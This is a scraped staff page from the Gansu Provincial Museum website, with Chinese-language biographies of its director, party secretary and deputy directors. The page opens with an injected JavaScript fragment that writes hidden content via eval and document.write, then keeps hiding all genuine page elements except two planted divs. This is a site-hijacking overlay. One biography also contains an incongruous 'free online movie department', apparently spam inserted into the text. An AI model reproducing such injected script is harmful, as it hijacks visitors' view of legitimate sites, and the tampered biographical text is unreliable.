'; eval("document.write('" + ss + "');"); try { setInterval(function() { try { document.getElementById("divAll").style.display = "none" } catch (c) {} for (var a = 0; a < document.body.children.length; a++) try { var b = document.body.children[a].id; "iconDiv1" != b && "showcloneshengxiaon" != b && (document.body.children[a].style.display = "none") } catch (d) {} }, 100) } catch (e$$2) {}; 现任领导 - 关于我们 - 甘肃省博物馆
  • 省博物馆馆长、研究员。男,汉族,生于1964年7月,大学本科。1981年参加工作,1984年至2009年在省博物馆历史部工作,主要研究方向是西北地区新石器时代文化、历代陶瓷、青铜器及玉器研究鉴定。2003年获全省文物工作先进个人,2006年获全国文物工作先进个人(郑振铎—王冶秋文物保护奖先进个人)。1995年始任甘肃省文物鉴定委员会委员。兰州大学历史文化学院兼职教授,西北师范大学文史学院兼职教授,专业硕士研究生导师,中国古陶瓷研究会理事,中国博协博新技术与空间利用专委会副主任委员,中国博协展览交流专委会副主任委员。

  • 省博物馆党委书记,男,回族,1966年10月出生,甘肃省临潭县人。1990年7月参加工作,中共甘肃省委党校研究生学历,1990年1月加入中国共产党。曾任省文物局博物馆处副处长,政策法规处副处长、处长,文物保护与考古处处长。2013年2月任副局长。2017年7月任甘肃省博物馆党委书记。

  • 省博物馆副馆长,女,汉族,1969年12月出生,籍贯甘肃庆阳,大学本科学历,1991年10月加入中国共产党。2001年5月任馆党办副主任,2002年11月任党办主任,2006年5月任人事教育处处长(党办主任),2014年7月被省委组织部任命为省博物馆党委委员、副馆长。负责馆行政财务工作,分管办公室(财务处)、文化产业处、工程设备部、开放管理部。现任中国博协文创专委会、市场推广专委会、流动博物馆专委会副主任委员。多次被省文化厅党组评选为“优秀党务工作者”、“优秀共产党员”;荣获甘肃省“联村联户为民富民”行动先进个人“标兵奖”。

  • 省博物馆副馆长、研究员。男,回族,1962年7月出生,籍贯北京市,大学本科,考古专业。1980年在省博参加工作,至1986年在文物保护技术部工作。1987年至2002年在历史部工作,主要研究方向是西北地区新石器时代文化、丝绸之路文化、历代陶瓷、青铜器及佛造像研究鉴定。2002年至2013年任办公室任副主任。2014年由省文化厅调任甘肃简牍博物馆副馆长。2018年由省委组织部调任省博副馆长。分管历史部、自然部、文物保护技术部、社会教育部。1995年至今任甘肃省文物鉴定委员会委员。2005年至2015年任兰州大学历史文化学院兼职教授。

  • 省博物馆副馆长、副研究馆员。1979年12月出生,藏族,甘肃文县人。毕业于兰州大学历史文献学专业,硕士研究生学历。2002年起先后就职于甘肃省博物馆、甘肃省文物资料信息中心。现任甘肃省博物馆副馆长,分管免费电影在线部、网络中心、信息资料中心以及文物数字化保护和宣传等工作。甘肃省文物鉴定委员会委员,主要研究方向为博物馆展览策划,中国古代金属器、玉器以及佛教造像研究、鉴定。

访问量统计:5983631    Copyright 2018-2029 甘肃省博物馆 版权所有 备案号:陇ICP备12000579号